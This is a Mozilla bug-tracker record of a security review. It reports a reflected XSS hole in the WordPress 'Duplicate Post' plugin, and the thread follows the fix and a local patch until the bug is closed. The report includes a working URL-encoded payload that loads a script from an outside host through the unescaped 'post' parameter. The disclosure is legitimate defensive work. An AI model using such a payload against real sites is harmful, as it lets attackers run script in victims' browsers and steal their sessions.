Closed Bug 770300 Opened 12 years ago Closed 12 years ago

"Duplicate Post" WP Plugin - Fix XSS Before Adding to Air Mozilla Blog

Categories

(Infrastructure & Operations Graveyard :: WebOps: Other, task)

x86
macOS
task
Not set
normal

Tracking

(Not tracked)

RESOLVED FIXED

People

(Reporter: mfuller, Assigned: dmaher)

References

Details

(Keywords: wsec-xss)

Bug 748584 requests that we add the "Duplicate Post" plugin to the Air Mozilla WordPress instance. During the security review, an XSS vulnerability was discovered. Before we can install the plugin, this code must be patched.

The issue occurs in the page: duplicate-post-admin.php.

The parameter, $id, is saved using $_GET['post']. A URL may look like: site.com/wp-admin/admin.php?action=duplicate_post_save_as_new_post&post=1 where '1' is the post to copy. However, if '1' doesn't exist, an error message is displayed, echoing '1' out without properly escaping.

This allows the code: <SCRIPT+SRC%3Dhttp%3A%2F%2Fha.ckers.org%2Fxss.js><%2FSCRIPT> as a parameter of 'post' to create XSS.

To fix this issue, use htmlspecialchars on the output of $id in the following line:
wp_die(esc_attr(__('Copy creation failed, could not find original:', DUPLICATE_POST_I18N_DOMAIN)) . ' ' . $id);
I sent the developer of the plug-in a link to this bug.
I also emailed the developer the day I found the bug and he replied saying he would provide an update. If this is not an urgent install for the blog owner, we can go ahead and wait for his update. If it is urgent, the fix involves adding one function around one line of code after the plugin is installed. Either way, let me know and I'll re-review it once it's updated.

Thanks,
Matt
Blocks: 775120
Assigning to WebOps to patch locally for deployment.
Assignee: nobody → server-ops-webops
Component: air.mozilla.com → Server Operations: Web Operations
Product: Websites → mozilla.org
QA Contact: cshields
Version: Firefox 6 → other
:zandr both -dev and -stage are now running the new reboot code for air.m.o, which is not wordpress based. on the production nodes, there is no duplicate post plugin, as expected. 

is there something specific you're looking for us (webops) to complete for you on this?
Assignee: server-ops-webops → dmaher
:cturra so the request is that webops implement the plugin in prod, but instead of running the vanilla code, we patch it as indicated in comment #1.  My plan is to pull the plugin repo as normal, create a local branch, modify the code, and roll with that.

:richard has confirmed that the prod site is EOL right now anyways, so we don't need to worry about long-term support.
Since creating local-only branches is not possible in svn, I instead simply downloaded the plugin tarball, decompressed it to the correct location, and patched it as necessary.  I also added a README.duplicate-post documenting the change.  I realise that this is a one-off, but this version of AirMo is EOL, so we don't need to worry about long-term support for this plugin.

I have confirmed with :richard that the plugin is operational.  Closing bug.
Status: NEW → RESOLVED
Closed: 12 years ago
Resolution: --- → FIXED
Thanks for your work on this!
Adding keywords to bugs for metrics, no action required.  Sorry about bugmail spam.
Keywords: wsec-xss
Component: Server Operations: Web Operations → WebOps: Other
Product: mozilla.org → Infrastructure & Operations
Product: Infrastructure & Operations → Infrastructure & Operations Graveyard
You need to log in before you can comment on or make changes to this bug.